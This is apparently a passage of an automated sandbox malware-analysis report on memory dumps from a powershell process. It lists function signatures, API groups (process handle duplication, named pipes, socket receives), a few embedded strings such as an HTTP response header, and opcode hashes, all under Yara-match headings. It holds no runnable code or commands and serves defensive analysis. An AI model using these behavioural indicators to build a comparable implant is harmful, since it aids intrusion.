                                                                                        • Instruction Fuzzy Hash: D7216D3D727A40D5FBA0DB29E9447EA23A1F7B7B84F8D44118809425A1CFADC84DC717
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 2328795619-0
                                                                                        • Opcode ID: 3f3dc365440aa2115fb6cd6e608bab10787d9be18d8fabc248aa910345d033f7
                                                                                        • Instruction ID: d69acbed9a6b25ad9802a45b991a91b0f625a380816da02218fab6caae9d39d0
                                                                                        • Opcode Fuzzy Hash: 3f3dc365440aa2115fb6cd6e608bab10787d9be18d8fabc248aa910345d033f7
                                                                                        • Instruction Fuzzy Hash: 71513D39706250C6F668CA2E95007ED6591B367BF4F2C8B11AF3953BD5DB34C49D8242
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 2328795619-0
                                                                                        • Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                                                                        • Instruction ID: 787aec024b3a76160875ef88a8f87e7efec034e9b50b975d16ce5d5541a5acea
                                                                                        • Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
                                                                                        • Instruction Fuzzy Hash: 41515839707240C2FA28CA6E95407EAB6D0B773BF4F1C4714AE3947BD5CB7AD4998242
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$freemalloc$_callnewh
                                                                                        • String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
                                                                                        • API String ID: 2029259483-317027030
                                                                                        • Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                                                                        • Instruction ID: adb738c5df48139faaa9b837d06f603ea5f4df56663ae6cce5612ce77d499bba
                                                                                        • Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
                                                                                        • Instruction Fuzzy Hash: F161F239305751CAEB50DB69E4402EEA3A1F3A6B80F540016EF4953B9AEF7CC50DCB41
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 445582508-0
                                                                                        • Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                                                                        • Instruction ID: 559635718ab02d6fe955e613e35e97ed727715236d9db5f1d766abb2d00eab29
                                                                                        • Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
                                                                                        • Instruction Fuzzy Hash: 7951E07A702780C2EB20CF18D4443ADA3A5FBA7B98F1D4525DA8A477E0DB78D859D702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                                                                                        • String ID:
                                                                                        • API String ID: 3587854850-0
                                                                                        • Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                                                                        • Instruction ID: ffc6ab91d97e22d4279b2cf76a852d2a5252768d2cbe21dce7e865356ea69091
                                                                                        • Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
                                                                                        • Instruction Fuzzy Hash: E541F839302650C2EB50EB2AE4147EE6251B7EBBD0F584221AE5A07BD7DE3DC50AC702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                                                                                        • String ID:
                                                                                        • API String ID: 3426420785-0
                                                                                        • Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                                                                        • Instruction ID: 2f9c3d18462c0bc8d2f6891c2914acb3a088cc9177e9d1ee637303021e9be03f
                                                                                        • Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
                                                                                        • Instruction Fuzzy Hash: 5541CE3E722610D5FB10EB79D9447DD23A0ABAB784F480512EE19936E6EE3DC40EC712
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                                                                                        • String ID:
                                                                                        • API String ID: 2310505145-0
                                                                                        • Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                                                                        • Instruction ID: 1671cd5683958f660d8803c0faf1a764129932b9fab0650fc670cf19ccb63f6e
                                                                                        • Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
                                                                                        • Instruction Fuzzy Hash: E1418A79303A40C2FB20CF29E44479A77A1F7A7795F1C4125EA89477A4DB3EC48ACB41
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$Current$ErrorLast$AttributeDuplicateObjectOpenProcThreadUpdate
                                                                                        • String ID:
                                                                                        • API String ID: 2604945796-0
                                                                                        • Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                                                                        • Instruction ID: db709bb0a987e55bcec5223c047349429655cfe446b216b6042c4cf02c615747
                                                                                        • Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
                                                                                        • Instruction Fuzzy Hash: 92419F7A316780C6EB60CF1A94043D977A0F7ABBD8F0C4125AA8947B95DF7DC60A8742
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                                        • String ID:
                                                                                        • API String ID: 1547050394-0
                                                                                        • Opcode ID: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                                                                                        • Instruction ID: e324ade201a37adb28a99d9209f85e7b7cdfa77ea84f91c0190bf7cce78b72f8
                                                                                        • Opcode Fuzzy Hash: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
                                                                                        • Instruction Fuzzy Hash: 3F21EB3930A786D9FB91DB2998013DEA6907767BC0F5C48219F49A7BD6EB3CC4088716
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                                        • String ID:
                                                                                        • API String ID: 1547050394-0
                                                                                        • Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                                                                        • Instruction ID: 5bb8bf1bf41c73b179f413d80d7760525f955a03723b00cd8c0526a2cee45d0b
                                                                                        • Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
                                                                                        • Instruction Fuzzy Hash: 8C21E77970B781C1FB61DB2A99013EE62D1BB67BC0F5C4821AE8997B96DB3DC4048702
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 2102446242-0
                                                                                        • Opcode ID: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                                                                                        • Instruction ID: 353e135238b6bce849a2939364684ea4139859fe9e749d05d75be3430e196596
                                                                                        • Opcode Fuzzy Hash: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
                                                                                        • Instruction Fuzzy Hash: 20210239702641C5FB15EF6D98913ED6692A7A37F0F4D4118EA26473D3EAB8884C8326
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 1616846154-0
                                                                                        • Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                                                                        • Instruction ID: 3e09e4fb06e36090ec343ffc77d32bd290535053e0b2cae4cfd124ffe35b5c67
                                                                                        • Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
                                                                                        • Instruction Fuzzy Hash: 4011B43D306B40C1EA10FB1AA1053EE5350A7A7FD4F9C4221AE6947BCBDE3DC50A8742
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
                                                                                        • String ID:
                                                                                        • API String ID: 3798860377-0
                                                                                        • Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                                                                        • Instruction ID: 80b73db50fe4b0df41ba5d57662c2358238ceab93f57a2f86cb418a01c5c98b6
                                                                                        • Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
                                                                                        • Instruction Fuzzy Hash: 5211D63A715A50C2FB20CB29F51475D2251F797BE4F494260DA5947A94CFBDC44A8702
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                                                                        • String ID: dpoolWait
                                                                                        • API String ID: 2026495703-1875951006
                                                                                        • Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                                                                        • Instruction ID: bfbf0afbdf262bfb41e4d36f716908a68eccfb97d300182fac520836ef58e917
                                                                                        • Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
                                                                                        • Instruction Fuzzy Hash: 8001267570279089EA85DB16B800B9D7299F7AAFE0F294619EF68537C6CF38C0058B41
                                                                                        APIs
                                                                                        Strings
                                                                                        • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 000001A6ED34F044
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                                                                                        • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                                                                                        • API String ID: 3518644649-2739389480
                                                                                        • Opcode ID: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                                                                        • Instruction ID: 7b18eadd757a682c9418717b6d9e0d1e0395228ff27811375ae0848f4e9277f9
                                                                                        • Opcode Fuzzy Hash: afba7a99536ed02a45dac5d500ee5d86b7940ec366185a31927e6e9a708e28fc
                                                                                        • Instruction Fuzzy Hash: 5C01A13D702B9081EA44DB56B40479A6799E7AABE1F0D4219EEA9477C6CE3DC0468780
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: freemallocstrchr$rand
                                                                                        • String ID:
                                                                                        • API String ID: 1305919620-0
                                                                                        • Opcode ID: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                                                                        • Instruction ID: 8b2553344a161d3e03e5089553a4d6297c5a91504f89fb95048ae07593bc54b8
                                                                                        • Opcode Fuzzy Hash: f55c98597b31e9256bdda085e271814e8bdd530284bc77f6856305a025606a71
                                                                                        • Instruction Fuzzy Hash: D0715C75706BC4C9FAA6DB2D90103EE6390EF67B84F1C4910DB8927796DE3DC14A8701
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: freemallocstrchr$rand
                                                                                        • String ID:
                                                                                        • API String ID: 1305919620-0
                                                                                        • Opcode ID: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                                                                        • Instruction ID: b6c34a314d4e5ae687b6b03afb14779867cf97947552048e22a21b26f5ea505d
                                                                                        • Opcode Fuzzy Hash: 5dd9697f37be70f43a9dfb8e879823c33dc0761040d61eac182ad5eba971c26a
                                                                                        • Instruction Fuzzy Hash: D671E979705EC4C1FA26DB2DA4113EAA390EFA7BD4F0C4125DB85177A6DE2EC14B8701
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2761444284-0
                                                                                        • Opcode ID: 482d0fdc53c6e33f66ba6dffc81b941b5e36cde37b3349caf1d2ee2be4f6f9f6
                                                                                        • Instruction ID: e97f98c2522ca171ca1488930f69e437e3f170aa6c209b03d12fac759129c140
                                                                                        • Opcode Fuzzy Hash: 482d0fdc53c6e33f66ba6dffc81b941b5e36cde37b3349caf1d2ee2be4f6f9f6
                                                                                        • Instruction Fuzzy Hash: 9C41FF3A302785DBEE96DB3A95502E92790BB2BB82F588420CF1647745EF34D46AC706
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: free$_errno$_callnewhmalloc$AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 996410232-0
                                                                                        • Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                                                                        • Instruction ID: 6c8017815ee8241c9cb913c08e7f176558ddf3d8fb5aeca4686d03f65dafb08e
                                                                                        • Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
                                                                                        • Instruction Fuzzy Hash: 0641E23E301B81CBEA55DBAA9A583DA2790B76BBC1F484120DE2697745DF38D42AC301
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: htonl$freemalloc
                                                                                        • String ID: zyxwvutsrqponmlk
                                                                                        • API String ID: 1249573706-3884694604
                                                                                        • Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                                                                        • Instruction ID: 8e720b555f92801d1f185432e6423b985cda95f5c3e742e637a3d6917173df1c
                                                                                        • Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
                                                                                        • Instruction Fuzzy Hash: 1C31473E302640C2EB44EA7EA5553E967C197ABBD4F4C4034AE5987797EE3DC40E8301
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
